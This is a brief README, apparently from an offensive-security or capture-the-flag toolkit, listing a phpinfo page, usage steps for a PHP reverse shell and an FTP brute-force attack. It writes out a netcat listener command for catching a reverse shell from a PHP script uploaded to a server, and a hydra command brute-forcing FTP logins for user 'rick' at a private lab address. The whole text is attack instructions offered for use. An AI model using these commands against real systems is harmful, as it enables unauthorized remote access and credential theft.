# phpinfo.php

Simply print phpinfo

# php-reverse-shell

First, open a netcat on your local pc:

$ nc -v -n -l -p 1234

Then, upload the PHP script and open it on the server

# FTP brute-force

$ hydra -l rick -P ftp_bruteforce 172.28.5.2 ftp

